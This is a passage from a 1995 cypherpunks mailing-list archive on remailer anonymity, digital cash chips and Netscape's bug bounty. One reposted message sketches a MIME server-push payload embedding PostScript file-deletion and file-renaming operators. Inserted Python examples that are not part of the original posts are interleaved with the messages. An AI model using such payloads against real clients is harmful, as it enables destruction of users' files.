From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 08:32:30 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
Message-ID: <199510181530.LAA00339@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:
>On Tue, 17 Oct 1995, Scott Brickner wrote:
>
>> Nathan Loofbourrow writes:
>> >And there's another item of note: each chip has a unique, etched,
>> >machine-readable serial number. What are the bets that Dallas
>> >Semiconductor can tell you who purchased that chip? Well, so much for
>> >an anonymous payment scheme based on *this* product.
>> 
>> Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
>> 
>And then sell the serial address for cash.
>How do I know that they (this means YOU! :> ) don't work for the company?
>(which is a contractor for, blackmail-victim of, tentacle of NSA, CSE, 
>TCMAY, Purplenet, your fairy-stepmother ...)

Big deal.  NSA now knows "someone bought address X".

That's the great thing about cash you know... anonymity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Oct 95 02:42:06 PDT
To: cypherpunks@toad.com
Subject: The Anonymous Bounty Claim
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <Pine.HPP.3.91.951018101847.20167A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> sameer wrote:
> > Phil Karlton wrote:

> > I am not quite sure what problem you are talking about? NFS and MITM
> > ftp attacks?

> 	This character has been going on and on regarding some big
> hole he apparently found in netscape, but no one else on the list
> seems to have noticed anything, or replicated any alleged claims he
> may have made. Maybe if the person in question would repost this
> alleged post describing some massive hole, it would help us all.

I am not technically competent to judge if his/her claim is worth
reposting, but here it is, clipped from the very long Friday 13
rant, as found at Raph's index site (Subject: Bugs Bounty??...shhh...
I'm huntin wa'bits... From:anonymous-remailer@shell.portal.com).

Mats
___________________________________________________________________

<long first part deleted; general aspects on the Bounty Hunt>

And this is where we introduce a little old document called pushpull.html
from Netscape's Web site. It's titled: An Exploration of Dynamic
Documents. 

> The Great Idea
> 
> The general idea is that browsers have always been driven by user
> input. You click on a link or an icon or an image and some data comes
> to you. As soon as people saw they could do that, they wanted to give
> a server the ability to push new data down to the browser. (An
> obvious example is a stock trader who wants to see new quote data
> every 5 minutes.) Up until now, that hasn't been possible.

And I can think of many people who would _also_ like to push down data
to a browser. But, that's not a great idea. Guess what?? It's not even 
a good idea. It might even be a bad idea.

> Netscape Navigator 1.1 gives content creators and server
> administrators two new open standards-based mechanisms for making this
> work. The mechanisms are similar in nature and effect, but
> complementary. They are: 
>
> Server push -- the server sends down a chunk of data; the
> browser displays the data but leaves the connection open; whenever
> the server wants it sends more data and the browser displays it,
> leaving the connection open; at some later time the server sends
> down yet more data and the browser displays it; etc.

Yes, the client "processes data" and then possibly displays it, while in

> Client pull -- the server sends down a chunk of data,
> including a directive (in the HTTP response or the document
> header) that says "reload this data in 5 seconds", or "go load
> this other URL in 10 seconds". After the specified amount of
> time has elapsed, the client does what it was told -- either
> reloading the current data or getting new data.

Hmm. Netscape's client blindly trusts and follows the server's instructions
and does what it is told to do. If it's told to load a particular
document in five seconds, it does that. It dances to the server's
instructions. Something which should cause any Security Administrator's
hair to stand on end, as the server takes control of the client's machine 
and "manipulates it".

> In server push, the magic is accomplished by using a variant of the
> MIME message format "multipart/mixed", which lets a single message (or
> HTTP response) contain many data items. In client pull, the magic is
> accomplished by an HTTP response header (or equivalent HTML tag) that
> tells the client what to do after some specified time delay. 
>
> For server push we use a variant of "multipart/mixed" called
> "multipart/x-mixed-replace". The "x-" indicates this type is
> experimental. The "replace" indicates that each new data block will
> cause the previous data block to be replaced -- that is, new data will
> be displayed instead of (not in addition to) old data. 
> 
> So here's an example of "multipart/x-mixed-replace" in action: 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the first object.
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the second and last object.
>>
>>--ThisRandomString--
> 
> The key to the use of this technique is that the server does not push
> the whole "multipart/x-mixed-replace" message down all at once but
> rather sends down each successive data block whenever it sees
> fit. 

And this is the problem. We have a pipe. And we have a server making a
decision when it will send the next data block. I guess the server could
also decide dynamically what that data block is going to be once it has
opened its pipe to the client. 

That is way too much trust for a client to place in a server that it 
doesn't know if it can trust.

> The HTTP connection stays open all the time, and the server
> pushes down new data blocks as rapidly or as infrequently as it wants,
> and in between data blocks the browser simply sits and waits for more
> data in the current window. The user can even go off and do other
> things in other windows; when the server has more data to send, it
> just pushes another data block down the pipe, and the appropriate
> window updates itself. 

Yep, the appropriate window just "updates" itself at the command of 
the server. A good faith update ... or let's call it a good faith 
process. 

> So here's exactly what happens:
>
> Following in the tradition of the standard "multipart/mixed",
> "multipart/x-mixed-replace" messages are composed using a unique
> boundary line that separates each data object. Each data object
> has its own headers, allowing for an object-specific content type
> and other information to be specified.

Let's emphasize that what we have is a slave client at one end of a pipe
accepting an object-specific content-type from any server. 

This is not within the tradition of multipart/mixed. 

And this is a problem.

> The specific behavior of "multipart/x-mixed-replace" is that each
> new data object replaces the previous data object. The browser
> gets rid of the first data object and instead displays the second
> data object. 
>
> A "multipart/x-mixed-replace" message doesn't have to end! That
> is, the server can just keep the connection open forever and send
> down as many new data objects as it wants. The process will then
> terminate if the user is no longer displaying that data stream in
> a browser window or if the browser severs the connection
> (e.g. the user presses the "Stop" button). We expect this will
> be the typical way people will use server push. 
>
> The previous document will be cleared and the browser will begin
> displaying the next document when the "Content-type" header is
> found, or at the end of the headers otherwise, for a new data block.
> The current data block (document) is considered finished when the
> next message boundary is found. 
>
> Together, the above two items mean that the server should push
> down the pipe: a set of headers (most likely including
> "Content-type"), the data itself, and a separator (message
> boundary). When the browser sees the separator, it knows to sit
> still and wait indefinitely for the next data block to arrive. 

Now let's play with the prior example. Let's say that we utilized
different types of objects. I'll use multipart/parallel and
application/postscript. 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: application/postscript
>>
>>Data for the first object
>>
>>--ThisRandomString
>>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
>>
>>--ThisSecondRandomString
>>Content-Type: application/postscript
>>
>>Data for the second object
>>
>>--ThisSecondRandomString
>>Content-type: application/postscript
>>
>>Deletefile
>>Renamefile
>>Filenameforall
>>File
>>
>>--ThisSecondRandomString--
>>
>>--ThisRandomString--

I think that the foregoing explains itself without me having to draw any
more maps than is absolutely necessary. The first data object sent is
application/postscript. The second object is multipart/parallel. 

And it's where we conflict with federal requirements:

> b. Unauthorized manipulation of the computer and its associated
> peripheral devices."[8, sec. I B.3]

And I think that this is applicable across the entire product line.

I wonder if this makes me eligible for a bounty for each product where 
there is this Security Bug?? That would be very chivalrous of Netscape
to offer me that. Then maybe I could get a real computer rather than 
this crufty old Mac Plus (a yellow one) and my 2400 baud modem... and 
then, I might just be able to do some virtually real hunting.

Alice de 'nonymous ... (doing a bad impression of Elmer Fudd with 
thoughts of Bugs Bounty in his lil mind.)

...just another one of those...

P.S. And yes I brought this whole issue (tangentially) to the 
attention of netscape.com yesterday afternoon. I think I asked 
whether they were going to have a formal specification and register
their x-mixed-replace with IANA. They haven't gotten to my email
yet, (I think). Or maybe, I'm in the Bulk response group. <shrug>

P.P.S. I give permission to have this propagate freely through 
the cyber-aethyr. All other rights are of course reserved.
C. S. U. M. O. C. L. U. N. E.

_____________________________________________________________________

end quote
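
The concern in the post above, accepting whatever per-part content type the server names, can be checked on the client side by walking every part of the stream, nested containers included, against an allowlist. This is an added example, not code from the post or from Netscape; the RENDERABLE set, MAX_DEPTH and the sample bodies are assumptions.

```python
# Added example: audit every part of a multipart/x-mixed-replace response.
# RENDERABLE and MAX_DEPTH are assumptions for a hypothetical client policy.

RENDERABLE = {"text/plain", "text/html", "image/gif", "image/jpeg"}
MAX_DEPTH = 4  # refuse containers nested deeper than this


def parse_content_type(value):
    """Split a Content-type value into (lowercased type, params dict)."""
    pieces = [p.strip() for p in value.split(";")]
    params = {}
    for piece in pieces[1:]:
        if "=" in piece:
            key, val = piece.split("=", 1)
            params[key.strip().lower()] = val.strip().strip('"')
    return pieces[0].lower(), params


def split_headers(block):
    """Separate header lines from the body at the first blank line."""
    lines = block.split("\n")
    headers = {}
    i = 0
    while i < len(lines) and lines[i].strip():
        if ":" in lines[i]:
            name, val = lines[i].split(":", 1)
            headers[name.strip().lower()] = val.strip()
        i += 1
    return headers, "\n".join(lines[i + 1:])


def split_parts(body, boundary):
    """Return the completed parts delimited by --boundary lines.

    A part counts only once its closing boundary has arrived, so the
    trailing block of a still-open push stream is not returned.
    """
    delim, closer = "--" + boundary, "--" + boundary + "--"
    parts, current = [], None
    for line in body.split("\n"):
        stripped = line.rstrip()
        if stripped == closer or stripped == delim:
            if current is not None:
                parts.append("\n".join(current))
            if stripped == closer:
                break
            current = []
        elif current is not None:
            current.append(line)
    return parts


def audit(message, depth=0):
    """Return [(depth, content_type, verdict)] for the message and its parts."""
    headers, body = split_headers(message)
    ctype, params = parse_content_type(headers.get("content-type", "text/plain"))
    if ctype.startswith("multipart/"):
        boundary = params.get("boundary")
        if not boundary or depth >= MAX_DEPTH:
            return [(depth, ctype, "refuse")]
        findings = [(depth, ctype, "container")]
        for part in split_parts(body, boundary):
            findings.extend(audit(part, depth + 1))
        return findings
    verdict = "render" if ctype in RENDERABLE else "refuse"
    return [(depth, ctype, verdict)]


# Constructed sample: same structure as the second example in the post,
# with the part bodies replaced by placeholders.
SAMPLE = """\
Content-type: multipart/x-mixed-replace; boundary=ThisRandomString

--ThisRandomString
Content-type: application/postscript

(placeholder body 1)

--ThisRandomString
Content-Type: multipart/parallel; boundary=ThisSecondRandomString

--ThisSecondRandomString
Content-Type: application/postscript

(placeholder body 2)

--ThisSecondRandomString
Content-type: application/postscript

(placeholder body 3)

--ThisSecondRandomString--

--ThisRandomString--
"""

if __name__ == "__main__":
    for depth, ctype, verdict in audit(SAMPLE):
        print("  " * depth + f"{ctype}: {verdict}")
```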








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Oct 95 03:05:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape whining virus
In-Reply-To: <Pine.3.89.9510180127.A64777-0100000@aix2.uottawa.ca>
Message-ID: <Pine.HPP.3.91.951018103637.23762A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca wrote:

> my little contribution: People download binaries off the net all the
> time. Code gets infected and infects PCs. Big deal.

You don't seem to understand the issue here. Netscape with JAVA is
supposed to become more or less the 'only' program you will run,
a kind of superimposed operative system, or your main shell for
running 'everything' from. Much of 'everything' will be downloaded
at the time of execution. (Microsoft is supposed to be reduced to
one of several 'kernel-suppliers' only.) And 'infected PCs' really
*are* a very big deal in corporate and institutional surroundings.

Mats  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Wed, 18 Oct 95 08:03:50 PDT
To: "'cypherpunks@toad.com>
Subject: Anonymity: A Modest Proposal
Message-ID: <01BA9D49.9E1723C0@hy35.capecod.net>
MIME-Version: 1.0
Content-Type: text/plain


I think that what you propose could be modeled as an
anonymous remailing distributed process.  If designed
correctly, such a process could be made extremely
difficult to shut down (even for us!)  There are more than 
enough texts written on how to do this correctly; no need
to reinvent the wheel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Wed, 18 Oct 95 12:23:22 PDT
To: cypherpunks@toad.com
Subject: the beverage you are about to drink
Message-ID: <199510181814.LAA28754@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



All this netscape-bashing reminds me ...

Doesn't anyone think it's sad-funny now that every styrofoam coffee cup has
to be labeled "Warning The Beverage You Are About To Consume Is Hot!!" 

The reality is, we don't want to get burned.  But the coffee is hot. So
you try to have some reasonable compromise since lukewarm coffee is just
not appetizing. 

Marianne
mrm@netcom.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 18 Oct 95 08:18:52 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181515.LAA02260@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> The vulnerability of the remailer system, in my opinion, rests in the
> fact that a remailer is physically located in a certain place.  This
> makes the remailer a target for attacks, as shown by the futile
> efforts (so far) of the so-called "church" of Scientology to silence
> the remailers at anon.penet.fi and xs4all.nl.  

Thus the need to locate them in countries where such suppression is not
supported. The vexing part is -- those places seem to have poor
connectivity. 

We need to provide a feed to Freedonia.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 11:18:01 PDT
To: cypherpunks@toad.com
Subject: Munition Code?
Message-ID: <m0t5d3p-000Rp7C@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok.. not a real brainbuster here.. where can I get a copy of the code that
is classified Munitions, as per the T-Shirts? I don't need the shirt <g>, I
just want to see the code..

Thanks to all who will point me in the right direction..

RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 09:37:16 PDT
To: stevenw@iglou.com (Steven Weller)
Subject: Re: I want to learn! [NOISE]
In-Reply-To: <v01530500acaac8503ff6@[206.86.1.35]>
Message-ID: <199510181636.MAA02026@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Steven Weller writes:
>>>From: VINCENT810@aol.com
>>>Subject: I want to learn!
>>>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>>     Me Too, I'm catching on but some help would help !
>Looks like this is now a proper noun, thanks to AOL.

Anyone else thinking those AOL ads that end "Ma!  Pa done shot up the
'merica on-line agin!" seem to be aimed dead-center for their
demographic?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 11:41:00 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510181839.LAA07648@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> wrote:
> David A Wagner wrote:
> > I do think their ``bug bounty'' system is an improvement -- at least
> > they're showing some concern for security, and beginning to admit
> > that outside review of security-critical code is...well...critical.
>
>   The whole bug bounty thing is an experiment.  We have no idea how
> valuable it will be, but we thought it would be worth trying.  As we
> gain more experience with it, we will probably evolve it.

Mr. Weinstein:

Is your comment about the "Bugs Bounty" program an official comment, that
you have "no idea how valuable" it will be??  Shall I give you a clue,
as to how valuable the discovery of a flawed algorithm might be??

How valuable do you think the ability to download an entire geo-physical
company's 3-D seismic data base is, while some company temp is looking at
a pretty picture of Moo Goo Gai pan, or downloading a recipe for goat-cheese
salad with ginger and macadamia nuts??

Why not admit that the whole Bugs Bounty program was a sham.  Nothing more
than a quickly slapped together public-relations program, that tried to
create an appearance that Netscape had a pro-active business plan.

Is it because there WAS no plan, whatsoever??

Why not admit that you were forced to take action and show that you were
"doing something" following the crack of the Netscape browser that was
supposed to protect sensitive information such as credit-card transactions.
And why not admit that what you did was raid a couple of left over press
kits, and take out some shirts and cups and throw together a damage control
program.  Your so-called "Bugs Bounty" program.

Is it because, a program that says that anyone who reports a "bug" in your
two billion dollar software wouldn't be rewarded -- no, they would
be entered into a draw where they _might_ could get a chance to win a cup
or a shirt??  Or they might receive a $1,000 reward as long as they agree
to a waiver of all their rights, and agree that by reporting the problem to
Netscape and entering the "Bugs Bounty" contest, that their report would:

   "become Netscape's property to be used at Netscape's sole discretion"

Is it because, this simply doesn't pass the giggle test??  And is
demonstrative of such a cavalier internal attitude and approach to
security that it can only be characterized as the grossest of misconduct?

I'm certain that even the marketing people must have burst into peals of
laughter at that one.

Why not admit that Netscape never thought that anyone would find anything at
all??  Why not admit that Netscape thought that they could weasel out of the
Berkeley crack, with a nice little pat on the head to the kids who found it??
Why not admit that not only did Netscape not have an action plan for "bugs"
prior to the "Berkeley crack", but doesn't have any action plan following it.

Why not admit that none of the cocky boys at Netscape had even considered
what would be done if there was an easily exploitable critical design flaw
in the algorithm.

And now that someone took Netscape up on its challenge, and simply said that
the emperor has no clothes, now that someone hasn't just discovered a "bug"
like the "Berkeley crack" but has demonstrated that the Netscape algorithm
is fatally flawed, by posting the exploitation algorithm, now what??

Good God, I asked for clarification from Netscape last Thursday, and Netscape
hasn't bothered to even return my email from almost a week ago.  And, after
posting the exploitation algorithm last week -- on Friday the Thirteenth --
there has been nothing but public relations huff-and-puff.

Clearly, no one performed adequate top-down / bottom-up analysis at Netscape.
And both the internal and external review process were woefully inadequate.

Or to steal a line from Jonathan Swift, in Gulliver's Travels.  Are you,

        "a most ingenious Architect who had contrived a new
         Method for building Houses, by beginning at the Roof,
         and working downwards to the Foundation ..."

and then done nothing else, but issue press-releases to hype and promote
Netscape stock in some self-centered attempt to help out your "friends"
on Wall Street.

>> Still, I do agree that they really oughta be employing true experts
>> to carefully evaluate their system, if they wanna claim anything about
>> its security.
>
>  We are doing that too.  We are paying outside consultants to review
>everything related to security.

Oh yep, I bet you're paying them.

I wonder ... are you paying them in shirts or mugs, for their white-wash
review??  And will the report from the external review become "Netscape's
sole property to be used at the sole discretion of Netscape".

Which consultants are you going to get, Mister (unofficial, off the record
speaking personally, not speaking for the Company) Netscape spokesperson??

Who?  AT&T??

AT&T has security people.  The phone company, has very good security
people. And the phone company is supposed to have good quality control,
(ISO-9000 or TQM or something ...) yet AT&T's own internal security
review missed this gaping gash in Netscape browser software.  Even now,
AT&T is using this software internally within its business units and is
ACTIVELY recommending a co-branded version of it to its worldwide customers.

Has Netscape informed AT&T about this??

I'm sure that Netscape has piled their best people into their Falcon and
are busily jetting them around the world signing confidentiality
agreements and retaining every possible outside consultant.  Entering into
agency agreements to keep the lid on the biggest international news story
since the Tylenol or Perrier poisoning.

I wonder who Netscape will get to sign??  Who's going to lend their name,
so that Netscape can say that "we're working closely with Jerry Lewis" or
something similar to solve our security problems.

But Mr. Lewis can't go public with what he knows, can he??  Even if he knows
that Netscape is fatally flawed.  Mr. Lewis will be a Netscape agent at that
point, won't he??  And he'll be bound by the terms of his confidentiality
agreement, even if the company is actively strategically misrepresenting
his confidential report.

Who's going to be left after Netscape hires all these outside consultants??
Who do you hire??  Euro-Mickey, Minnie and Donald Duck??

Captain Kangaroo??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@cdsnet.net (Doug Cutrell)
Date: Wed, 18 Oct 95 11:43:32 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d24acaaefb40aa5@[204.118.244.112]>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:

>If you
>split the message into shadows, you avoid having anyone in this
>position.

Hal Finney <hfinney@shell.portal.com> responds:
>...If the end user is
>responsible for reassembly, then that is tantamount to voluntarily
>agreeing to receive anonymous messages, and that is no problem...
>...And of course anonymous news
>postings via shadows would also have the reassembly problem.

It seems that there could at least be a hierarchy of shadowed newsgroups,
e.g. alt.freespeech.*,  requiring the enduser to use special software to
reassemble actual postings.  This could even be integrated into the
newsreaders, or even at a local newserver level.

To post to these groups, something like the current Mixmaster remailer
network might be used, with extensions for posting "shadows"
to these newsgroups.  So posting would require slightly more enduser
sophistication, and the ability to encrypt.  The client posting software
would hit ITAR, but presumably not the client reassembly software
(newsreader extensions, etc.), since it doesn't need the ability to
encrypt.

Then the newsgroup hierarchy itself would become the target of control
fervor.  Perhaps this could be fought with an emphasis on freedom of
speech and creation of newsgroups for "political expression", e.g.
alt.freespeech.talk.politics, etc.  It's unfortunate, but good soundbites
can be as important as good protocols:  "Freedom of Speech in Cyberspace:
Feds want to eliminate so-called "freespeech newsgroups" on the new
information superhighway..."

I haven't done my homework on protocols for distributing shadows.  Are
there problems with this, other than the obvious one of actually
doing all the work?

Doug Cutrell

_____________________________________________________________
Doug Cutrell                    General Partner
doug@cdsnet.net                 Open Mind
=============================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 09:52:37 PDT
To: Modemac <modemac@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181652.MAA02409@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
>The vulnerability of the remailer system, in my opinion, rests in the
>fact that a remailer is physically located in a certain place.
...
>Since the prime vulnerability of the remailers rests in their physical
>locations, we have the possibility of physically hiding their
>locations.
...
>The basic idea for this system goes like this:
> 
>     1) A person writes a message and encrypts it with PGP.
>     2) That person then posts his message to the "anonymous messages"
>        newsgroup.
>     3) A remailer scanning the newsgroup picks up the message,
>        decrypts it, strips the headers and makes it anonymous, and
>        sends it to its destination.

This doesn't really help.  The only information that's different in
this approach is in fields that are removed by the remailer before it
goes to the folks who get upset.  I suppose it might improve the
traffic analysis situation somewhat, though, by making it harder
for the analyst to collect all the data.

>To offer further protection for the remailers, a random system could
>be devised to ensure that no one knows exactly which remailer scans a
>particular message at a particular time.
...
>A series of remailers would be used to decrypt anonymous messages.
>A "token" (like the token ring of IBM fame) would be passed back and
>forth between all of the Cryptoclients in the remailer network, so
>that only one remailer would be "active" at any given time.  This
>token would be passed back and forth at random, so no one would know
>exactly which remailer is being used to anonymize a message.

Why bother?  It means all the remailers need to share the same key,
making it impossible to add a new remailer without verifying that it
isn't a CoS/NSA/FBI/whatever tentacle.

A vastly simpler solution would be to have all the remailers scanning
all the time, and only forwarding those messages encrypted with its
key.

>The "token" is the key to this remailing system.  This token would
>include necessary information such as the last message scanned, and
>to coordinate timing among the remailers.  This will work to avoid
>duplication of messages.

This also significantly overestimates the efficiency of news propagation.
Two remailers at distant parts of the net see news messages arrive
in different orders --- often a message received at one point won't
reach the other for up to a day.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 18 Oct 95 08:54:46 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181353.GAA25545@jobe.shell.portal.com>
Message-ID: <9510181554.AA05280@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> This has always been the weak link in the remailer system: the last
> remailer in the chain takes the political and legal heat.

A cause of this is that the last remailer is the only agent in a
position to see the message before delivery, so it can be argued that
it should take responsibility for the decision to deliver.  If you
split the message into shadows, you avoid having anyone in this
position.  It can then be argued that nobody should pass along random
noise from unknown parties... you can't solve political problems with
technology, but you can make the politics increasingly absurd.

Well, maybe it wouldn't be considered too absurd.  "Remailing unknown
data is like letting scruffy-looking people put things in your
carry-on luggage."?  Pretty close, if you think speech is a bomb.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 18 Oct 95 09:04:01 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d02acaa97afa587@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 AM 10/18/95, Hal wrote:

>Now, since I have set it up this way, which was about two years ago, I
>have not received a single complaint about operating the remailer at
>alumni.caltech.edu.  Nobody sends me mail saying "your system is
>accepting objectionable messages."  Instead, all the complaints I get are
>about the Portal remailer (averaging one per week, probably).  People
>complain when they receive a message or newsgroup posting that they find
>objectionable.  They don't care if some system is accepting messages.
>They care about the system which is sending them.
>
>This has always been the weak link in the remailer system: the last
>remailer in the chain takes the political and legal heat.  If there is
>ever a libel or copyright infringement suit, or criminal prosecution,
>against a remailer it will almost certainly be against the last remailer
>in the chain.  Those are the source of the complaints and those are the
>ones which people try to shut down.

        Well, when some folks want to circumvent this kind of last-link
accountability (even if they are the _only_ link), they simply forge their
headers--so why not incorporate that tactic into the remailer net?

        Also, maybe apropos...It seems to me that there should be a way,
within the remailer net, to synthesize forged-path strings with the "Human
ID through insecure channel" remarks you made a few days ago.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 09:13:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181613.MAA01473@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
> The basic idea for this system goes like this:
>  
>      1) A person writes a message and encrypts it with PGP.
>      2) That person then posts his message to the "anonymous messages"
>         newsgroup.
>      3) A remailer scanning the newsgroup picks up the message,
>         decrypts it, strips the headers and makes it anonymous, and
>         sends it to its destination.

Just for the record, I'll note this is a fairly old idea (cf. the 
Cyphernomicon, news:alt.anonymous, news:alt.anonymous.messages, etc.)

[...]
> A "token" (like the token ring of IBM fame) would be passed back and
> forth between all of the Cryptoclients in the remailer network, so
> that only one remailer would be "active" at any given time.  This
> token would be passed back and forth at random, so no one would know
> exactly which remailer is being used to anonymize a message.

I don't see how this is possible given widespread RFC 822 compliance. 
Any given message must be sent from some particular address. I see two 
main options:

(1) The remailed-message is sent as a single message from a single remailer.
    That remailer is subject to various sorts of pressure if the remailed-
    message offends its recipient.

(2) The remailed-message is sent as several messages from several remailers.
    The recipient's MDA reassembles the fragments into the remailed-message.
    Any or all of those remailers are subject to pressure if the remailed-
    message offends the recipient.

Either way, at least one remailer is subject to pressure for sending a 
specific piece of email.

(If the token is passed around randomly, then it might be more difficult for 
an adversary to predict which remailer will send the _next_ message. However,
adversaries such as Cof$ are interested in assailing remailers that have
_already_ sent messages, due to the content of those messages. They can tell 
which remailer sent _past_ messages, which is what they need.)  

-Futplex <futplex@pseudonym.com>
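
The "shadows" approach raised in this thread, where each remailer forwards a piece that is noise on its own and the recipient's software reassembles, can be sketched as follows. This is an added example, not code from any poster or remailer project; n-of-n XOR splitting, the dictionary layout and the set identifiers are assumptions, since the thread does not say which splitting scheme is meant.

```python
# Added example: n-of-n XOR "shadows" with recipient-side reassembly.
# Field names ("set", "index", "total", "data") are hypothetical.
import secrets
from collections import defaultdict


def xor_bytes(blobs):
    """XOR equal-length byte strings together."""
    out = bytearray(len(blobs[0]))
    for blob in blobs:
        if len(blob) != len(out):
            raise ValueError("shadows of one set must have equal length")
        for i, b in enumerate(blob):
            out[i] ^= b
    return bytes(out)


def split_into_shadows(message, n, set_id):
    """Split message into n shadows; all n are needed to recover it.

    n-1 shadows are uniformly random pads and the last is the message
    XORed with every pad, so any n-1 of them reveal nothing about it.
    """
    if n < 2:
        raise ValueError("need at least two shadows")
    pads = [secrets.token_bytes(len(message)) for _ in range(n - 1)]
    final = xor_bytes([message] + pads)
    return [
        {"set": set_id, "index": i, "total": n, "data": data}
        for i, data in enumerate(pads + [final])
    ]


class Reassembler:
    """Collects shadows that arrive in any order, from any number of sets."""

    def __init__(self):
        self.pending = defaultdict(dict)

    def receive(self, shadow):
        """Return the plaintext once a set is complete, otherwise None."""
        if not 0 <= shadow["index"] < shadow["total"]:
            raise ValueError("shadow index out of range")
        slot = self.pending[shadow["set"]]
        slot[shadow["index"]] = shadow["data"]  # a duplicate just overwrites
        if len(slot) < shadow["total"]:
            return None
        blobs = [slot[i] for i in range(shadow["total"])]
        del self.pending[shadow["set"]]
        return xor_bytes(blobs)


if __name__ == "__main__":
    # Constructed messages; arrival order is shuffled and interleaved to
    # mimic the out-of-order propagation mentioned in the thread.
    a = split_into_shadows(b"first constructed message", 3, "set-a")
    b = split_into_shadows(b"second one", 2, "set-b")
    box = Reassembler()
    for shadow in [a[2], b[1], a[0], a[0], b[0], a[1]]:
        print(shadow["set"], shadow["index"], box.receive(shadow))
```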



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Wed, 18 Oct 95 12:24:46 PDT
To: cypherpunks@toad.com
Subject: Tales from Tech Support
Message-ID: <199510181924.PAA03259@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain



This is just one of the incredible "Tales from Tech Support" you can find on 
web page:
http://128.218.7.140/auricular/homepage/tstales/tstales7.html
Enjoy !



SuperMac records a certain number of technical support calls at random, to 
keep tabs on customer satisfaction. By wild "luck", they managed to catch 
the following conversation on tape.

Some poor SuperMac TechSport got a call from some middle level 
official...from the legitimate government of Trinidad. The fellow spoke very 
